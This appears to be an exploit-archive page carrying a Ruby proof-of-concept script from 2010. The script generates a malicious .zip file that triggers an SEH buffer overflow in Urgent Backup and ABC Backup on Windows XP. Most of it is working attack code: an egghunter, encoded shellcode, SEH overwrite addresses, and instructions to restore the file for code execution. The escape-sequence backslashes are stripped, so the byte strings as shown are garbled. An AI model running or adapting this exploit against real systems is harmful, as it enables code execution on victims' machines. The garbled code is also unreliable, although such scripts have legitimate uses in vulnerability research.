[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Urgent Backup 3.20 / ABC Backup Pro 5.20 / ABC Backup 5.50 (.zip) SEH
# Published : 2010-04-30
# Author : Lincoln
# Previous Title : PhotoFiltre Studio X .tif file local buffer overflow poc(0day)
# Next Title : Avast! 4.7 aavmker4.sys privilege escalation
#!/usr/bin/ruby
# Software : Urgent Backup 3.20 / ABC Backup Pro 5.20 / ABC Backup 5.50
# Author : Lincoln
# Date : April 27, 2010
# Reference : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-034
# OS : Windows
# Tested on : XP SP3 En (VirtualBox)
# Type of vuln : SEH
# Greetz to : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes.
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#
banner =
"|------------------------------------------------------------------|n" +
"| __ __ |n" +
"| _________ ________ / /___ _____ / /____ ____ _____ ___ |n" +
"| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |n" +
"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |n" +
"| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |n" +
"| |n" +
"| http://www.corelan.be:8800 |n" +
"| |n" +
"|-------------------------------------------------[ EIP Hunters ]--|n"
unless ARGV.length == 1
print banner
puts "[+] Exploit for Urgent Backup 3.20 / ABC Backup Pro 5.20 / ABC Backup 5.50"
puts "[+] Usage: select form the following:"
puts "[+] 1). Urgent Backup 3.20 & ABC Backup Pro 5.20"
puts "[+] 2). ABC Backup 5.50"
puts "[+] ex: ./urgent.rb 1nn"
exit
end
var = ARGV[0].to_i
#Zip Headers
header1=
"x50x4bx03x04x14x00x00x00" +
"x00x00xb7xacxcex34x00x00" +
"x00x00x00x00x00x00x00x00" +
"x00xc4x09x00x00x00"
header2=
"x50x4bx01x02x14x00x14x00" +
"x00x00x00x00xb7xacxcex34" +
"x00x00x00x00x00x00x00x00" +
"x00x00x00x00xc4x09x00x00" +
"x00x00x00x00x01x00x24x00" +
"x00x00x00x00x00x00"
header3=
"x50x4bx05x06x00x00x00x00" +
"x01x00x01x00xf2x09x00x00" +
"xe2x09x00x00x00x00"
#sub dx, 3000
egg =
"x66x81xeaxb8x0bx42x52x6a" +
"x02x58xcdx2ex3cx05x5ax74" +
"xefxb8x77x30x30x74x8bxfa" +
"xafx75xeaxafx75xe7xffxe7"
#msgbox: "Exploited by Corelan Security Team"
shellcode =
"w00tw00t" +
"x89xe3xdaxd7xd9x73xf4x59x49x49x49x49x49x49" +
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5a" +
"x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41" +
"x42x32x42x42x30x42x42x41x42x58x50x38x41x42" +
"x75x4ax49x4ax79x4ax4bx4dx4bx4bx69x51x64x45" +
"x74x4ax54x45x61x4ex32x4ex52x42x5ax46x51x49" +
"x59x42x44x4ex6bx51x61x44x70x4cx4bx43x46x44" +
"x4cx4ex6bx42x56x47x6cx4cx4bx51x56x44x48x4c" +
"x4bx51x6ex45x70x4ex6bx45x66x50x38x50x4fx47" +
"x68x50x75x4cx33x50x59x45x51x4bx61x4bx4fx48" +
"x61x51x70x4cx4bx50x6cx46x44x45x74x4cx4bx51" +
"x55x47x4cx4cx4bx50x54x43x35x50x78x43x31x4b" +
"x5ax4cx4bx42x6ax47x68x4ex6bx43x6ax47x50x45" +
"x51x4ax4bx48x63x46x57x50x49x4ex6bx44x74x4c" +
"x4bx45x51x4ax4ex44x71x49x6fx50x31x4bx70x4b" +
"x4cx4ex4cx4fx74x4bx70x43x44x46x6ax4ax61x4a" +
"x6fx44x4dx47x71x4bx77x48x69x4ax51x4bx4fx49" +
"x6fx49x6fx45x6bx43x4cx45x74x51x38x51x65x49" +
"x4ex4ex6bx42x7ax45x74x45x51x4ax4bx43x56x4e" +
"x6bx46x6cx42x6bx4cx4bx43x6ax45x4cx43x31x4a" +
"x4bx4ex6bx45x54x4ex6bx47x71x4dx38x4fx79x51" +
"x54x46x44x47x6cx45x31x4ax63x4fx42x44x48x46" +
"x49x48x54x4fx79x4bx55x4dx59x49x52x50x68x4c" +
"x4ex50x4ex44x4ex48x6cx50x52x4bx58x4dx4cx4b" +
"x4fx49x6fx4bx4fx4fx79x51x55x46x64x4dx6bx51" +
"x6ex49x48x4dx32x51x63x4cx47x45x4cx44x64x51" +
"x42x4dx38x4ex6bx49x6fx49x6fx4bx4fx4cx49x42" +
"x65x47x78x43x58x42x4cx50x6cx45x70x4bx4fx51" +
"x78x47x43x45x62x46x4ex45x34x45x38x51x65x51" +
"x63x45x35x44x32x4dx58x51x4cx44x64x44x4ax4c" +
"x49x48x66x43x66x4bx4fx43x65x46x64x4cx49x4b" +
"x72x50x50x4dx6bx4ex48x4cx62x50x4dx4dx6cx4e" +
"x67x47x6cx47x54x46x32x4bx58x43x6ex49x6fx49" +
"x6fx49x6fx42x48x51x74x45x71x51x48x45x70x43" +
"x58x44x30x43x47x42x4ex42x45x44x71x4bx6bx4b" +
"x38x43x6cx45x74x46x66x4bx39x48x63x45x38x50" +
"x61x42x4dx50x58x45x70x51x78x42x59x45x70x50" +
"x54x51x75x51x78x44x35x43x42x50x69x51x64x43" +
"x58x51x30x43x63x45x35x43x53x51x78x42x45x42" +
"x4cx50x61x50x6ex42x48x51x30x51x53x50x6fx50" +
"x72x45x38x43x54x51x30x50x62x43x49x51x78x42" +
"x4fx43x59x42x54x50x65x51x78x42x65x51x68x42" +
"x50x50x6cx46x51x48x49x4ex68x50x4cx46x44x45" +
"x72x4dx59x49x71x44x71x4ax72x43x62x43x63x50" +
"x51x46x32x4bx4fx48x50x50x31x4fx30x46x30x4b" +
"x4fx51x45x44x48x45x5ax41x41"
size = 2496
junk = "x90" * (276 - egg.length)
nseh = "x5cx61x98xa0" #pop esp / pop ad / jmp ecx
seh = "x16x66x40x00" #universal p/p retn 8
altseh = "x7Ex6Bx6Bx00" #universal p/p retn 8 for ABC 5.50 regular
pay1 = junk + egg + nseh + seh + shellcode
pay2 = junk + egg + nseh + altseh + shellcode
rest = "D" * (size - pay1.length)
opt1 = pay1 + rest + ".txt"
opt2 = pay2 + rest + ".txt"
if var == 1
if File.exist?("Urgent2.zip") then
File.delete("Urgent2.zip")
end
filename = "Urgent1.zip"
f = File.new(filename, 'w')
f.write header1 + opt1 + header2 + opt1 + header3
f.close
print banner
puts "[+] Exploit for Option 1: Urgent Backup 3.20 & ABC Backup Pro 5.20"
puts "[+] file size : #{opt1.length}"
puts "[+] Wrote exploit file : #{filename}"
puts "[+] Run zip as restore task and boom!nn"
exit
elsif var == 2
if File.exist?("Urgent1.zip") then
File.delete("Urgent1.zip")
end
filename = "Urgent2.zip"
f = File.new(filename, 'w')
f.write header1 + opt2 + header2 + opt2 + header3
f.close
print banner
puts "[+] Exploit for Option 2: ABC Backup 5.50"
puts "[+] file size : #{opt2.length}"
puts "[+] Wrote exploit file : #{filename}"
puts "[+] Run zip as restore task and boom!nn"
exit
else
puts "DOH!, read the instructions: ./urgent.rb"
end